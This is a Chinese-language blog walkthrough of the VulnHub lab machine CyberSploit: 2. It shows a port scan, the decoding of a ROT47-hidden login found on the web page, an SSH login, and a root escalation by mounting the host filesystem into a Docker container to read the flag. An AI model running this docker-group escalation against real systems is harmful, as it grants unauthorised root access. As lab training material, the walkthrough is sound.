vulnhub靶机-CyberSploit: 2

1、找到靶机ip:192.168.0.131

nmap -sn 192.168.0.0/24

2、扫描靶机端口

root@kali:~# nmap -p- -A 192.168.0.130
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for 192.168.0.130
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
|   2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_  256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
MAC Address: 08:00:27:F1:D7:A0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds

3、访问80端口,几个正常的用户名和密码中间夹杂着一个不正常的用户名和密码

拿去解密,猜可能是要移位,而且是要全部跟着移,使用rot47在线网站成功解密

D92:=6?5C2	4J36CDA=@:E`
shailendra	cybersploit1

4、ssh远程登录,用户名和密码:shailendra/cybersploit1,在家目录下发现提示文件:hint.txt,内容是docker,这老朋友了,果断id查看用户组,果然发现是docker组的,二话不说,先看看,本地有没有镜像,发现又没有,又得联网拉取镜像,然后和之前一样的操作了,成功提权,拿到flag

root@kali:~# ssh shailendra@192.168.0.131
shailendra@192.168.0.131's password: cybersploit1(不可见)
There were 3 failed login attempts since the last successful login.
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ ls
hint.txt
[shailendra@localhost ~]$ cat hint.txt 
docker
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
[shailendra@localhost ~]$ docker pull alpine
Using default tag: latest
latest: Pulling from library/alpine
df20fa9351a1: Pull complete 
Digest: sha256:185518070891758909c9f839cf4ca393ee977ac378609f700f60a771a2dfe321
Status: Downloaded newer image for alpine:latest
docker.io/library/alpine:latest
[shailendra@bogon ~]$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        7 weeks ago         5.57MB
[shailendra@bogon ~]$ docker run -v /:/mnt  -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /mnt/root/
/mnt/root # ls
anaconda-ks.cfg  flag.txt         get-docker.sh    logs}
/mnt/root # cat flag.txt 
 __    ___   _      __    ___    __   _____  __  
/ /`  / / \ | |\ | / /`_ | |_)  / /\   | |  ( (` 
\_\_, \_\_/ |_| \| \_\_/ |_| \ /_/--\  |_|  _)_) 

 Pwned CyberSploit2 POC

share it with me twitter@cybersploit1

              Thanks ! 
/mnt/root # 
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页